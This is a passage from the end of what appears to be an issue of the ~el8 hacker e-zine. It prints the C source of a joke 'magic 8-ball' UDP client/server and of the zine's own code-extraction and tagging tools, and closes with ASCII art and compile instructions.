curs_set(FALSE); box(ball,ACS_VLINE,ACS_HLINE); touchwin(ball); wrefresh(ball); move(1,1); mvwaddstr(ball,1,2,"And the answer is..."); wattrset(ball,A_STANDOUT); mvwaddstr(ball,2,((int)((60-strlen(MAGIC))/2)),MAGIC); wrefresh(ball); sleep(3); wclear(ball); endwin(); return 0; } int doleds(void) { int Ent,cons; if (getuid()!=0||geteuid()!=0) return 0; // silly kiddie, trix are for r00t! #ifndef __linux__ printf("not linux\n"); sleep(1); return 0; } #else if((cons=open("/dev/console", O_RDWR | O_NOCTTY)) < 0) { perror("open(console)"); exit(-1); } fprintf(stderr,"Now using your LED's to generate some magic!\n"); for(Ent=0;Ent<65;Ent++,usleep(1000*Ent)) ioctl(cons,KDSETLED,1+(rand()%5)); close(cons); ioctl(cons,KDSETLED,0x0); return 0; } #endif [END_CUT] client.c [CUT_HERE] eball.h /* magic 8-ball server / client */ /* by fB [funny bunny] - catch me in #hack.jp any server */ /* el8@press.co.jp subject: fB rulz */ /* Parts (c) Magic 8-ball Co. */ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <signal.h> #include <errno.h> #include <getopt.h> #include <unistd.h> #include <stdlib.h> #include <netdb.h> #define MAX_MAGIC 255 #define BALL_PORT 8888 #define BALL_LOG "./ball.log" #define YES 1 #define NO 0 [END_CUT] eball.h [CUT_HERE] magic.c /* MAGIC STUFF */ #include "eball.h" extern void init_magic(void) { /* this algorithm (c) Magic 8-ball Co. */ register int X,Y,Z; #ifdef DEBUG printf("%u - ",rand()); #endif X=rand(); Y=rand(); Z=rand(); srand((int)time(NULL)); X=(int)rand()%10; Y=(int)rand()%20; Z=(int)rand()%30; for(;X>0;X--) { Y=rand()%10; Z=rand()%10; } for(;Y>0;Y--) { X=rand()%10; Z=rand()%10; } for(;Z>0;Z--) { X=rand()%10; Y=rand()%10; } #ifdef DEBUG printf("%u = diff\n",rand()); #endif } int get_magic(char *question) { rand(); // ditch the first call rand(); // second one is dirty /* c'mon lucky three! */ return ((int) (rand()^(int)*question)); } char *getmmsg(int spice,char *mmsg,char *b[],int bsize) { int bean; srand(spice); bean = rand()%bsize; mmsg = b[bean]; return b[bean]; } [END_CUT] magic.c [CUT_HERE] main.c #include "eball.h" char *getmmsg(int,char*,char*[],int); void init_magic(void); int get_magic(char*); int ball_serv(void); int ball_client(char*,short,int); extern char *optarg; extern int optind; // this usage (c) funny bunny void usage(const char *argv0, const char *msg) { fprintf(stderr,"\033[2J\033[47;2m[" "\033[m" "\033[41;27;1m error: %69s " "\033[m" "\033[47;2m]\033[m" "\n\033[47;2m\033[m%78s\033[47;2m\033[m" "\n" "%s [-s] [server]\n" "%s [-c hostname] <question> [client]\n" "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" "\n" // remove this if you dont getchar() "\033[47;2m[\033[m" "\033[42;27;1m" " magic 8-ball %57sby fB " "\033[m\033[47;2m]" "\033[m" ,msg," ",argv0,argv0," "); getchar(); return; } main (int argc,char **argv) { int isClient=-1; char c; char *hostname=NULL; while((c=getopt(argc,argv,"sc:"))!=EOF) { switch(c) { case 's': isClient=NO; break; case 'c': isClient=YES; hostname = optarg; break; default: usage(argv[0],"invalid option"); exit(1); } } if(isClient==YES && (hostname==(char*)NULL || optind>=argc)) { usage(argv[0],"no question / hostname"); exit(1); } if(isClient==-1) { usage(argv[0],"must specify either client or server mode"); exit(1); } setvbuf(stdout,(char*)NULL,_IONBF,0); //srand(isClient=YES?*hostname:time(NULL)^rand()); srand(rand()%(int)time(NULL)); init_magic(); if (isClient == YES) { printf("[%s: client mode]\n" "%s %i\n" "%u\n",argv[0],hostname,BALL_PORT,get_magic(argv[optind])); ball_client(hostname,BALL_PORT,get_magic(argv[optind])); } else { printf("[%s: server mode]\n",argv[0]); ball_serv(); } return 0; } [END_CUT] main.c [CUT_HERE] server.c #include "eball.h" int beancounter=10; char *magic_dust[] = { " Outlook does not look good. ", " Definetly No. ", " Yes!! ", " Nope. ", " I'm sorry - no. ", " HELL NO! ", " uhh... no. ", " FER SHER!!! ", " like, as if! ", " like, totally ", }; FILE *stdlog = NULL; int con=0; void getsig(int); extern int ball_serv(void) { int sockfd=0, magic_bean; socklen_t addrlen; struct sockaddr_in me,you; char data[MAX_MAGIC]; char *magic_msg=(char*)malloc(((size_t)MAX_MAGIC*sizeof(char))); time_t t1me; if (NULL==(stdlog = fopen(BALL_LOG,"a+"))) { perror(BALL_LOG); exit(-1); } signal(SIGTERM,getsig); signal(SIGQUIT,getsig); signal(SIGINT,getsig); if (fork() != 0) exit(0); setsid(); if ( (sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) { perror("udp socket"); exit(-1); } bzero((char*)&data,sizeof(data)); bzero((char*)&you,sizeof(you)); bzero((char*)&me,sizeof(me)); me.sin_family = AF_INET; me.sin_addr.s_addr = htons(INADDR_ANY); me.sin_port = htons(BALL_PORT); you.sin_family = AF_INET; you.sin_addr.s_addr = htons(INADDR_ANY); addrlen=(socklen_t)sizeof(you); if ((bind(sockfd,(struct sockaddr*)&me,sizeof(me)) <0)) { perror("couldn't bind to udp port!"); exit(-1); } for(;;) { if (recvfrom(sockfd,data,sizeof(data)-1,0, (struct sockaddr *) &you, &addrlen) > 0) { if ((sscanf(data,"%i",&magic_bean))==1) { con++; #ifdef DEBUG printf("data in\n"); #endif t1me = time(NULL); fprintf(stdlog,"%.24s: %s [%i]\n",ctime(&t1me), inet_ntoa(you.sin_addr), magic_bean); magic_msg = getmmsg(magic_bean,magic_msg,magic_dust,beancounter); #ifdef DEBUG printf("sending: [%.50s]\n",magic_msg); #endif if (sendto(sockfd,magic_msg,MAX_MAGIC,0, (struct sockaddr *)&you,(socklen_t)sizeof(you))<0) { #ifdef DEBUG perror("sending magic msg"); exit(-1); #endif /* DEBUG */ } } } //bzero(magic_msg,sizeof(magic_msg)); bzero((char*)&data,sizeof(data)); } fflush(stdlog); shutdown(sockfd,2); fclose(stdlog); } /* standard server.getsig() */ void getsig(int s) { fprintf(stderr,"Caught signal %i, exiting...\n",s); fprintf(stderr,"[%i connections]\n",con); fflush(stdlog); exit(-1); } [END_CUT] server.c [END_DIR] 8ball ____________________________________ .-' `-. [26]| ELDUMP and ELTAG |[26] [26]| by: |[26] [26]| ~el8 |[26] `-.____________________________________.-' [BEGIN_DIR] . [CUT_HERE] eldump.c /* -+-+ cat <<'/*++--++*'> eldump.c # */ /********************************************** * released under (E) licensing ... * * (E) RULES AND REGULATIONS * * permission to use/rewrite/add : granted * * permission to trojan/steal : denied * * permission to use illegally : denied * * permission to use on dev/urandom : denied * **********************************************/ /******************************************* * eldump.c for standard UNIX compilers * * next version: * * * * +article extraction (ablility to *(E)* * specify article number) *[~]* * +code extract by article number *[E]* * +GUI interface for file viewing *[L]* * (most likely curses based) *[8]* * +ability to update code/articles via *[`]* * updates/correction posted *[9]* * on ~el8 website *[9]* * +much cooler/faster/stronger/portable * * +Versions for DOS C/COBOL/Asm/Pascal * *******************************************/ // Questions/Comments/Corrections @ el8@press.co.jp // el8.n3.net // packetstorm.securify.com/mag/~el8/ #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> /************************************** * next version of eldump will have * * a lot more features, this is just * * a basic code extraction version. * * - team ~el8 * * * * #define ISH_START "[SOI] %s" * * #define ARTICLE_START "[BOW] %s" * * #define ARTICLE_END "[EOW]" * * #define ISH_END "[EOI]" * **************************************/ /* for verbosity */ #define VERBOSE 0x01 #define VERY 0x10 #define LOTS 0x20 /* char array sizes */ #define LINELEN 80 #define BUFLEN 255 /* Issue Tag Defines */ #define CODE_START "[CUT_HERE] %s" #define CODE_START_ARGS 1 #define DIR_START "[BEGIN_DIR] %s" #define DIR_START_ARGS 1 #define DIR_END "[END_DIR] %s" #define DIR_END_ARGS 1 #define CODE_END "[END_CUT] %s" #define CODE_END_ARGS 1 #define loop(n) for(;n;) /* global vars */ FILE *TextFD; char BaseDirectory[BUFLEN], buf[LINELEN], CodeDir[BUFLEN + BUFLEN], tmp[LINELEN]; int verbose = 0, linez = 0, codez = 0, dirz = 0; const char *license = \ "/***********************************************\n" " * released under (E) licensing ... *\n" " * (E) RULES AND REGULATIONS *\n" " * permission to use/rewrite/add : granted *\n" " * permission to trojan/steal : denied *\n" " * permission to use illegally : denied *\n" " * permission to use on /dev/urandom : denied *\n" " ***********************************************/\n" "/* contact el8@press.co.jp for full license */\n" "/* code copyrighted by ~el8 -- don't infringe! */\n\n"; /********************** * int article(char *); * int issue(char *); **********************/ /* function prototypes */ int code (char *); int extr (char *); int main (int argc, char *argv[]) { int NumberOfFiles; // For multiple files getcwd (BaseDirectory, BUFLEN); // error checking is for pussiez setvbuf (stderr, (char *) NULL, _IONBF, 0); //unbuffer stderr (usually unbuffered anyhow) if (argc < 2) // no options specified { fprintf (stderr, "\033[0;36m" ".---------------------------------------.\n" "|\033[1;36m /\\/| _ ___ _ \033[0;36m |\n" "|\033[1;36m |/\\/ ___| |( _ ) _____ _| |_ _ __ \033[0;36m|\n" "|\033[1;36m / _ \\ |/ _ \\ / _ \\ \\/ / __| '__| \033[0;36m|\n" "|\033[1;36m | __/ | (_) || __/> <| |_| | \033[0;36m|\n" "|\033[1;36m \\___|_|\\___/ \\___/_/\\_\\\\__|_| \033[0;36m|\n" "`---usage-------------------------------'\n" "\033[m\n" "\033[7m %s [file1 file2 file3 ...] <option>\t\033[m\n" "\033[0;32m\n" ".---options-----------------------------.\n" "|+\033[1;32m [-v]: verbose \033[0;32m |\n" "|+\033[1;32m [-vv]: very verbose\033[0;32m |\n" "|+\033[1;32m [-vvv]: very very verbose \033[0;32m |\n" "`---------------------------------------'\n" "\033[m", argv[0]); exit (-1); } verbose -= verbose; // zero verbose if (!strncmp (argv[argc - 1], "-v", 2)) // if the last option was a "-v" { verbose = VERBOSE; argc--; } else if (!strncmp (argv[argc - 1], "-vv", 3)) // "-vv" { verbose = (VERY + VERBOSE); argc--; } else if (!strncmp (argv[argc - 1], "-vvv", 4)) // "-vvv" { verbose = (LOTS + VERBOSE + LOTS); argc--; } if (argc < 2) { fprintf (stderr, "need files...\n"); exit (-1); } for (NumberOfFiles = 1; NumberOfFiles < argc; NumberOfFiles++) { if (verbose >= LOTS) { fprintf (stderr, "eldumping code from %s\n", argv[NumberOfFiles]); if (extr (argv[NumberOfFiles]) == 0) { fprintf (stderr, "[#%i] code eldump of %s: success!\n", NumberOfFiles, argv[NumberOfFiles]); } else { fprintf (stderr, "[#%i] code eldump of %s: failed.\n", NumberOfFiles, argv[NumberOfFiles]); } } else { extr (argv[NumberOfFiles]); } } if (verbose >= VERBOSE) { fprintf (stderr, "\t%i texts\n\t%i dirs\n\t%i codes\n\t\%i lines\n", NumberOfFiles - 1, dirz, codez, linez); } exit (0); } int extr (char *TextFileName) { char arg[LINELEN]; if ((TextFD = fopen (TextFileName, "r")) == NULL) { fprintf (stderr, "opening text %s: %s\n", TextFileName, strerror (errno)); return (-1); } loop (!feof (TextFD)) { fgets (buf, LINELEN, TextFD); if (sscanf (buf, DIR_START, arg) == DIR_START_ARGS) { snprintf (CodeDir, sizeof CodeDir, "%s/%s", BaseDirectory, arg); if (verbose >= VERBOSE) { fprintf (stderr, "creating %s/\n", CodeDir); dirz++; } if ((mkdir (CodeDir, 0700) == -1) && (errno != EEXIST)) { perror (CodeDir); fclose (TextFD); return (-1); } if (chdir (CodeDir) == -1) { fprintf (stderr, "changing to code dir %s: %s\n", CodeDir, strerror (errno)); fclose (TextFD); return (-1); } else if (verbose >= LOTS) fprintf (stderr, "changing to %s\n", CodeDir); } else if (sscanf (buf, CODE_START, arg) == CODE_START_ARGS) { if (verbose >= VERY) fprintf (stderr, "eldumping %s\n", arg); if (code (arg) == -1) { fclose (TextFD); return (-1); } } else if (sscanf (buf, DIR_END, tmp) == DIR_END_ARGS) { if (verbose >= LOTS) fprintf (stderr, "changing to ..\n"); chdir ((!strcmp (arg, ".")) ? "." : ".."); } } fclose (TextFD); return (0); } int code (char *CodeFileName) { FILE *CodeFile; char codebuff[BUFLEN]; chdir ((CodeDir != NULL) ? CodeDir : "."); if ((CodeFile = fopen (CodeFileName, "w+")) == NULL) { fprintf (stderr, "opening code %s: %s\n", CodeFileName, strerror (errno)); return (-1); } if (verbose >= VERBOSE) codez++; if (CodeFileName[strlen(CodeFileName)-1] == 'c' && CodeFileName[strlen(CodeFileName)-2] == '.') fputs (license, CodeFile); loop (!feof (TextFD)) { fgets (codebuff, LINELEN, TextFD); if (sscanf (codebuff, CODE_END, tmp) == CODE_END_ARGS) { if (verbose >= LOTS) fprintf (stderr, "end of %s\n", CodeFileName); fclose (CodeFile); break; } else { fputs (codebuff, CodeFile); if (verbose >= VERBOSE) linez++; } } return 0; } // [CUT_HERE] <NAME> then [END_CUT] <NAME> // // [BEGIN_DIR] <NAME> then [END_DIR] <NAME> // /*++--++* cat <<'[EOI]'> /dev/null */ [END_CUT] eldump.c [CUT_HERE] eltag.c #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <string.h> #define loop(n) for(;n;) char *TAG="[(%i) %s]"; char *TOCTAG="~el8|*iSSue2*[(%u) %s]*iSSue2|~el8"; extern char *optarg; FILE *out; void t4gz(char *,char*,int); int main (int argc, char *argv[]) { int p; char *file; int type; char *t4g = TAG; if (argc < 3) { fprintf (stderr, "usage: %s <format> <-t> [-f infile] <-o outfile>\n" "formats:\n" "\t[-i]: integer output\n" "\t[-X]: uppercase hexidecimal output\n" "\t[-O]: octal output\n" "\t[-x]: lowercase hexadecimal\n" "[-t] = output table of contents\n",argv[0]); exit (-1); } while ( (p = getopt(argc,argv,"tiXOxf:o:"))!=EOF){ switch(p){ case 't': t4g = TOCTAG; break; case 'i': type = p; break; case 'X': type = p; break; case 'O': type = p; break; case 'x': type = p; break; case 'f': file = optarg; break; case 'o': if ((out=fopen(optarg,"w+"))==NULL) { perror(optarg); exit (-1); } break; default: exit(-1); } } if (out==NULL) out=stderr; t4gz(file,t4g, type); exit (0); } void t4gz (char *T,char *tag,int io) { char articlename[80]; unsigned articleno=0; int lineno; FILE *TFD; char buf[80]; if ((TFD = fopen (T, "r")) == NULL) { perror(T); exit (-1); } bzero((char*)&buf,sizeof(buf)); lineno-=lineno; loop (!feof (TFD)) { lineno++; fgets (buf, sizeof(buf), TFD); if (sscanf(buf,tag,&articleno,articlename) == 2) { if (buf[strlen(buf)-1] == '\n') buf[strlen(buf)-1] = '\0'; switch (io) { case 'i': fprintf(stderr,"[(%04i) %20s]\t @ \033[1mLine %i\033[m\n",articleno,articlename,lineno); break; case 'X': fprintf(stderr,"[(%4X) %20s]\t @ \033[1mLine %i\033[m\n",articleno,articlename,lineno); break; case 'O': fprintf(stderr,"[(%4o) %20s]\t @ \033[1mLine %i\033[m\n",articleno,articlename,lineno); break; case 'x': fprintf(stderr,"[(%4x) %20s]\t @ \033[1mLine %i\033[m\n",articleno,articlename,lineno); break; default: fprintf(stderr,"[(%04i) %20s]\t @ \033[1mLine #%i\033[m\n",articleno,articlename,lineno); break; } } bzero((char*)&buf,sizeof(buf)); } fclose (out); fclose (TFD); exit (0); } [END_CUT] eltag.c ____________________________________ .-' `-. [27]| cl0s1ng |[27] [27]| by: |[27] [27]| ~el8 |[27] `-.____________________________________.-' em4il uz! m0re submissi0nz w0uld b gre4t! iph there'z n0t much submissi0nz it'll b a ye4r again! we kn0w u d0nt w4nt that! [EOW] [EOI] echo ' lllllll 888888888 l:::::l 88:::::::::88 l:::::l 88:::::::::::::88 l:::::l 8::::::88888::::::8 eeeeeeeeeeee l::::l 8:::::8 8:::::8 ee::::::::::::ee l::::l 8:::::8 8:::::8 _________ _____ e::::::eeeee:::::ee l::::l 8:::::88888:::::8 / \ / |e::::::e e:::::el::::l 8:::::::::::::8 / ~el8 \/ /e:::::::eeeee::::::el::::l 8:::::88888:::::8 / _ / e:::::::::::::::::e l::::l 8:::::8 8:::::8 / / \ / e::::::eeeeeeeeeee l::::l 8:::::8 8:::::8 \_____/ \________/ e:::::::e l::::l 8:::::8 8:::::8 e::::::::e l::::::l8::::::88888::::::8 e::::::::eeeeeeee l::::::l 88:::::::::::::88 ee:::::::::::::e l::::::l 88:::::::::88 eeeeeeeeeeeeee llllllll 888888888 .g4yd4nb4n. ' echo 'Extracted eldump.c' echo 'use $CC eldump.c -o eldump' echo './eldump ~el8[0] (-v | -vv | -vvv)' echo echo ' * ~el8 team 294 local 24 *' echo ' * check local listings *'